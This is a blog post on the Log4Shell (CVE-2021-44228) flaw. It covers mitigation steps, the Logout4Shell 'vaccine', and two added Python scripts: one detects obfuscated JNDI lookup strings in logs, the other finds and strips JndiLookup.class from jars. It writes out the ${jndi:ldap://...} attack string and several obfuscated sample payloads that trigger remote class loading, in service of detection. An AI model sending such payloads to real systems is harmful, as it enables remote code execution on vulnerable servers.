A vaccine for the Log4Shell flaw – Korben

If you take even a passing interest in computer security, you will not have missed that on December 9 a 0-day vulnerability in Apache Log4j was disclosed. Named Log4Shell, it affects log4j versions 2.0-beta9 through 2.14.1 and was given a CVSS severity score of 10/10.

Woohoo.

It is all over the place, all the more so because the flaw is being actively exploited. In short, all an attacker needs is to get the following string into something that log4j ends up logging:

${jndi:ldap://URL.com/FICHIER_JAVA}

and log4j will resolve that JNDI lookup against the LDAP server at “URL.com/FICHIER_JAVA”, which can point the JVM at a Java class to download and execute. It is as simple as it is dramatic.
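To see what a detection rule has to cope with, here is an example added here (not code from the original post, from Cybereason or from the Log4j project) that undoes the obfuscated forms of that lookup string attackers were sending and flags the log lines that contain one. The log lines inside it are constructed, and the 203.0.113.0/24 addresses are documentation space.

```python
"""Spot Log4Shell lookup strings in log lines, including obfuscated ones.

Collapses the nested ${lower:..}/${upper:..}/${..:-default} tricks used to
hide "${jndi:" from naive grep rules, then reports the scheme and host of
each lookup. Sample log lines below are constructed for this example.
"""
import re
from urllib.parse import unquote

# An innermost lookup: "${...}" whose body contains no further braces.
INNERMOST = re.compile(r"\$\{([^{}]*)\}")
# Once normalised, the attack string starts with "${jndi:<scheme>://<host>".
JNDI = re.compile(
    r"\$\{\s*jndi\s*:\s*(?P<scheme>[a-z0-9+.-]+)://(?P<host>[^/:}\s]+)", re.I
)


def _resolve(body):
    """Text an innermost lookup evaluates to, or None to leave it alone.

    Mirrors just enough of Log4j's StrSubstitutor to undo obfuscation:
    ${lower:X}/${upper:X} change case, and ${name:-default} falls back to
    the default when the lookup cannot resolve (${::-j} or ${env:NOPE:-j}).
    """
    name, has_default, default = body.partition(":-")
    prefix, _, arg = name.partition(":")
    prefix = prefix.strip().lower()
    if prefix == "lower":
        return arg.lower()
    if prefix == "upper":
        return arg.upper()
    if prefix == "jndi":
        return None  # the dangerous lookup itself: keep it so JNDI can match it
    if has_default:
        return default
    return None  # ${date:...}, ${ctx:...}, plain ${var}: harmless, leave as-is


def normalize(line, max_rounds=50):
    """Percent-decode, then evaluate innermost lookups until nothing changes."""
    text = unquote(line)
    for _ in range(max_rounds):
        changed = False

        def evaluate(match):
            nonlocal changed
            resolved = _resolve(match.group(1))
            if resolved is None:
                return match.group(0)
            changed = True
            return resolved

        text = INNERMOST.sub(evaluate, text)
        if not changed:  # every resolved lookup removes one ${...} pair, so this terminates
            break
    return text


def scan(line):
    """Return (normalized_line, [(scheme, host), ...]); an empty list means clean."""
    norm = normalize(line)
    hits = [(m.group("scheme").lower(), m.group("host")) for m in JNDI.finditer(norm)]
    return norm, hits


def scan_lines(lines):
    """(index, findings) for every line that carries a JNDI lookup."""
    return [(i, scan(line)[1]) for i, line in enumerate(lines) if scan(line)[1]]


SAMPLE_LOG_LINES = [  # constructed access-log and app-log lines
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.9 - - "GET /?q=${${lower:j}ndi:${lower:l}dap://203.0.113.7/b} HTTP/1.1" 404',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.8/c}"',
    '10.0.0.9 - - "GET /%24%7Bjndi%3Adns%3A%2F%2F203.0.113.9%2Fd%7D HTTP/1.1" 404',
    'user=bob msg="budget is ${amount} for ${date:yyyy}"',
]

if __name__ == "__main__":
    for i, hits in scan_lines(SAMPLE_LOG_LINES):
        print(f"line {i}: Log4Shell probe -> {hits}")
```

Run it over the fields where the payloads actually landed (User-Agent, X-Forwarded-For, URL query strings, usernames), not just the message body, and remember it percent-decodes only once, so double-encoded probes need an extra pass. The `jndi:` prefix is the thing to match on; whether the scheme is ldap, ldaps, rmi or dns changes only the second stage of the attack.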

There is a lot of literature on this, in particular from CERT-FR, so I will not dwell on the subject, but an interesting and fun GitHub project has grown out of all this mess.

As you know, to fix this Log4Shell vulnerability (CVE-2021-44228), it is urgent to update log4j to version 2.15.0 or later (follow-up issues in that patch were fixed in later releases, so take the newest one available).

And if this is not possible:

For applications using versions 2.10.0 and later of the log4j library, it is also possible to guard against any attack by setting the configuration parameter log4j2.formatMsgNoLookups to true, for example by launching the Java virtual machine with the option -Dlog4j2.formatMsgNoLookups=true. Another alternative is to remove the JndiLookup class from the classpath to eliminate the main attack vector (the researchers do not rule out the existence of another attack vector).

CERT-FR
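Both workarounds assume you know where log4j-core lives, which in practice is the hard part. As an added example (not code from the post, from CERT-FR or from the Log4j project), here is a scanner that walks a directory, looks inside every jar, war and ear including jars nested one level down (fat jars and WARs bundle log4j-core), reads the version from Maven's pom.properties, and implements the second workaround by removing JndiLookup.class from a jar. The demo jar it builds is a constructed stand-in holding only the entries the scanner looks at.

```python
"""Find log4j-core jars that still carry JndiLookup.class and strip it.

The demo jar is a constructed stand-in: real log4j-core has hundreds of
classes, but the scanner only needs the two entries written below.
"""
import io
import os
import re
import tempfile
import zipfile

JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
# Threshold from the post (2.15.0); later advisories raised it, so prefer the newest release.
FIXED_IN = (2, 15, 0)


def _version_tuple(version):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 9), which still sorts below the fix."""
    return tuple(int(x) for x in re.findall(r"\d+", version)[:3])


def scan_jar_bytes(data, label, findings):
    """Record a finding if this jar looks like log4j-core, then recurse into nested jars."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = set(zf.namelist())
        version = None
        if POM_PROPS in names:
            for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
        has_lookup = JNDI_LOOKUP in names
        if has_lookup or version is not None:
            findings.append({
                "jar": label,
                "version": version,
                "jndi_lookup_present": has_lookup,
                # Exploitable as the post describes: lookup class present and version below the
                # fix. An unknown version is treated as vulnerable rather than silently passed.
                "vulnerable": has_lookup and (version is None or _version_tuple(version) < FIXED_IN),
            })
        for name in sorted(names):  # fat jars / WARs embed log4j-core as a nested jar
            if name.lower().endswith((".jar", ".war", ".ear")):
                scan_jar_bytes(zf.read(name), f"{label}!{name}", findings)
    return findings


def scan_directory(root):
    """Findings for every jar/war/ear below root (nested jars are labelled outer!inner)."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in sorted(files):
            if name.lower().endswith((".jar", ".war", ".ear")):
                path = os.path.join(dirpath, name)
                with open(path, "rb") as fh:
                    scan_jar_bytes(fh.read(), path, findings)
    return findings


def strip_jndi_lookup(jar_path):
    """Rewrite jar_path without JndiLookup.class; True if the class was removed.

    Only a top-level jar is handled: a copy nested in a fat jar or WAR must be
    unpacked, stripped and repacked, and the JVM has to be restarted afterwards.
    """
    with open(jar_path, "rb") as fh:
        data = fh.read()
    with zipfile.ZipFile(io.BytesIO(data)) as src:
        if JNDI_LOOKUP not in src.namelist():
            return False
        out = io.BytesIO()
        with zipfile.ZipFile(out, "w") as dst:
            for item in src.infolist():
                if item.filename != JNDI_LOOKUP:
                    dst.writestr(item, src.read(item.filename))  # keeps per-entry compression
    tmp = jar_path + ".tmp"
    with open(tmp, "wb") as fh:
        fh.write(out.getvalue())
    os.replace(tmp, jar_path)  # atomic swap: a crash cannot leave a half-written jar behind
    return True


def make_demo_jar(path, version="2.14.1"):
    """Constructed stand-in for log4j-core-<version>.jar; the .class entries are dummy bytes."""
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with zipfile.ZipFile(path, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(POM_PROPS, f"version={version}\ngroupId=org.apache.logging.log4j\n")
        zf.writestr(JNDI_LOOKUP, b"\xca\xfe\xba\xbe")
        zf.writestr("org/apache/logging/log4j/core/Logger.class", b"\xca\xfe\xba\xbe")
    return path


def demo():
    """Scan, strip, rescan. Returns (findings_before, removed, findings_after)."""
    with tempfile.TemporaryDirectory() as root:
        jar = make_demo_jar(os.path.join(root, "lib", "log4j-core-2.14.1.jar"))
        fat = os.path.join(root, "app.jar")
        with zipfile.ZipFile(fat, "w") as zf:  # fat jar embedding the same log4j-core
            zf.write(jar, "BOOT-INF/lib/log4j-core-2.14.1.jar")
        before = scan_directory(root)
        removed = strip_jndi_lookup(jar)
        after = scan_directory(root)
        return before, removed, after


if __name__ == "__main__":
    for finding in demo()[0] + demo()[2]:
        print(finding)
```

The demo deliberately leaves one copy vulnerable: the log4j-core nested inside app.jar is reported but not stripped, which is exactly the case that bites in production (Spring Boot fat jars, WARs, Elasticsearch and other bundled deployments). Removing the class is only effective once the process has been restarted, and it silently breaks any configuration that legitimately used `${jndi:...}` lookups, so the upgrade remains the real fix.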

But another option is to let nature take its course, and that is what Cybereason proposes with Logout4Shell, a piece of code that exploits the Log4Shell vulnerability to … simply patch it.

The payload loaded through the flaw forces the Log4j logger to reconfigure itself, flipping the relevant parameter (formatMsgNoLookups) to true, and thereby blocks any further exploitation through this vector.

It is a kind of cyber vaccine while waiting for a real update of Log4j, and no more than that: the fix lives only in the memory of the running JVM (a restart brings the vulnerable configuration back), and it leans on the same formatMsgNoLookups switch that was later found insufficient in some non-default configurations (CVE-2021-45046).

If you are interested, the code is available on GitHub.

Good luck to those impacted.
